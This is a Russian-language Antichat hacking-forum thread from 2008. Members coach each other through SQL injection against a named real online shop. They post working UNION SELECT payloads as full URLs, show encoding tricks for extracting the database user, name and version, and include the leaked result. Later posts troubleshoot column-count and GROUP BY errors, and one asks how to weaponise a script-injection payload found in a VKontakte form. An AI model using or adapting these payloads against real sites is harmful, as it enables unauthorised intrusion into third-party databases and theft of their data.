Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

28.11.2008, 01:09
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме: 1325167
Репутация:
100
|
|
Понятно. еще вопрос.
__http://www.originalstore.it/index.php?page=viewprod&id=-1+UNION+SELECT+1,2,3,4,5,6,7,8.9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34,35,36/*
почему, когда хочу узнать версию базы данных, выскакиет ошибка?
___http://www.originalstore.it/index.php?page=viewprod&id=-1+UNION+SELECT+1,2,database(),4,5,6,7,8.9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34,35,36/*
|
|
|

28.11.2008, 01:20
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме: 14023893
Репутация:
2163
|
|
проблемы с кодировкой используй конструкцию aes_decrypt(aes_encrypt())
/add jokester опередил с примером '(
Последний раз редактировалось l1ght; 28.11.2008 в 01:31..
|
|
|

28.11.2008, 01:24
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме: 1325167
Репутация:
100
|
|
Неа. Это не помогает. почему-то.
|
|
|

28.11.2008, 01:27
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме: 17621293
Репутация:
4915
|
|
Сообщение от Ershik
Неа. Это не помогает. почему-то.
отлично помогает 
http://www.originalstore.it/index.php?page=viewprod&id=-1+UNION+SELECT+1,2,UNHEX(HEX(concat_ws(0x3a,User() ,Database(),Version()))),4,5,6,7,8.9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30, 31,32,33,34,35,36/*
administrator@localhost:gestione:4.1.11-Debian_4sarge7-log
И это тоже разумеется :
http://www.originalstore.it/index.php?page=viewprod&id=-1+UNION+SELECT+1,2,aes_decrypt(aes_encrypt(concat_ ws(0x3a,User(),Database(),Version()),1),1),4,5,6,7 ,8.9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24, 25,26,27,28,29,30,31,32,33,34,35,36/*
Последний раз редактировалось jokester; 28.11.2008 в 01:30..
|
|
|

28.11.2008, 01:34
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме: 1325167
Репутация:
100
|
|
Я осознал.
Спасибо 
|
|
|

28.11.2008, 15:21
|
|
Познающий
Регистрация: 04.08.2008
Сообщений: 53
Провел на форуме: 63941
Репутация:
2
|
|
При исполнении следующих запросов :
page.php?id=-1'+order+by+3/* :
Unknown column '3' in 'order clause' (Казалось бы все нормально, НО!)
page.php?id=-1'+order+by+2/*
Выдает :
Mixing of GROUP columns (MIN(),MAX(),COUNT(),...) with no GROUP columns is illegal if there is no GROUP BY clause
Что это означает? И как это победить?
|
|
|

28.11.2008, 15:28
|
|
Познающий
Регистрация: 26.10.2008
Сообщений: 50
Провел на форуме: 536527
Репутация:
62
|
|
Сообщение от SHS
При исполнении следующих запросов :
page.php?id=-1'+order+by+3/* :
Unknown column '3' in 'order clause' (Казалось бы все нормально, НО!)
page.php?id=-1'+order+by+2/*
Выдает :
Mixing of GROUP columns (MIN(),MAX(),COUNT(),...) with no GROUP columns is illegal if there is no GROUP BY clause
Что это означает? И как это победить?
так мож тут 2 колонки.
попробуй терь page.php?id=-1'+union+select+1,2/*
|
|
|

28.11.2008, 15:58
|
|
Познающий
Регистрация: 04.08.2008
Сообщений: 53
Провел на форуме: 63941
Репутация:
2
|
|
Там и есть 2 колноки, но при запросе page.php?id=-1'+union+select+1,2/* :
Mixing of GROUP columns (MIN(),MAX(),COUNT(),...) with no GROUP columns is illegal if there is no GROUP BY clause
|
|
|

28.11.2008, 16:26
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме: 14023893
Репутация:
2163
|
|
нужно указать группировку по полю (у вас конец запроса обрывается комментариями), т.е.
ляляля + group by поле/*
Последний раз редактировалось l1ght; 28.11.2008 в 16:29..
|
|
|

28.11.2008, 17:31
|
|
Новичок
Регистрация: 22.11.2008
Сообщений: 5
Провел на форуме: 88733
Репутация:
0
|
|
Я не уверен в том что это серьезный баг, вконтакте если зайти в свой аккаунт, раздел "мои группы" - справа вверху форма "фильтр групп".
В этой форме выполняется
"><script>alert('test')</script>
Код формы
<div class="groupsLookupCont"><input placeholder="Фильтр групп" id="g_filter" class="inputText" onkeyup="if (window.rs) {rs.lookup(this, event);}" type="text"></div>
<script type="text/javascript">
placeholderSetup('g_filter');
</script>
Собственно вопрос такой: можно ли сформировать ссылку XSS?
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|